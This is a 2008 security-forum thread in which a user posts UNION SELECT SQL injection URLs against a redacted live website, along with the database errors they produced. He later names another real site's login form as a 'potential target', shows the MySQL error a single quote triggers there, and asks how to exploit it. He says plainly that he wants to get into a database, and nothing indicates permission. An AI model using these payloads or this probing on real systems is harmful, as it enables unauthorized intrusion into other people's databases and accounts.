 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
|
 |
 Posted: Fri May 30, 2008 12:44 pm |
 |
|
| tinman |
| Active user |
 |
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
 |
|
 |
|
| Code: | | http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.tables--+ |
| Quote: | | Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT 1,2,3,4,5,6,7,8 FROM information_schema.tables-- . SELECT command denied to user '*********'@'localhost' for table 'tables' |
| Code: | | http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+test_schema.tables--+ |
| Quote: | | Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT 1,2,3,4,5,6,7,8 FROM test_schema.tables-- . SELECT command denied to user '*********'@'localhost' for table 'tables' |
| Code: | | http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.test_tables--+ |
| Quote: | | Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT 1,2,3,4,5,6,7,8 FROM information_schema.test_tables-- . SELECT command denied to user '*********'@'localhost' for table 'test_tables' |
|
|
|
|
|
|
|
|
|
| Posted: Fri May 30, 2008 1:33 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Hmm, i fail to see any exploitability here. Just ignore this phenomena, because same error message seems to be popping up for any nonexisting "database.table" query. |
|
|
|
|
| Posted: Fri May 30, 2008 2:49 pm |
|
|
| tinman |
| Active user |
|
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
I feel such an idiot! I've actually bothered to look at the HTML (yep, the first base that I skipped) and this page is linking to someone elses script. What a fool I am!
| Code: |
<form method="get" action="http://search.atomz.com/search/">
<div align="center">
<input size=15 name="sp-q">
<br>
<br>
<input type=submit value="Search" name="submit">
<input type=hidden name="sp-a" value="sp1001f700">
<input type=hidden name="sp-f" value="iso-8859-1">
</div>
</form> |
Which appears to be some third party website and not even the same database I want to get in to! DOH!!! |
|
|
|
|
|
|
|
|
| Posted: Tue Jun 17, 2008 7:29 am |
|
|
| tinman |
| Active user |
|
|
| Joined: May 11, 2008 |
| Posts: 37 |
|
|
|
|
|
|
|
Coming back to this, I've spent a few weeks playing and I've come up with a potential target. Windows server running MySQL (yum!)
The page concerned is a form processing thing which uses post
http://xxxxxxxxxxxxxxxxxxxx.com:80/Check_Member.asp
| Code: | | FORM METHOD="post" ACTION="Check_Member.asp" |
The form has a username and password field. If you place a simple ' into the username and anything in the password field you get this:
| Code: | Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 5.1 Driver][mysqld-5.0.51b-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
/Check_Member.asp, line 86 |
Does this tell me anything useful and how can I exploit it? |
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 3 of 3
Goto page Previous1, 2, 3
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 328
Members: 0
Total: 328
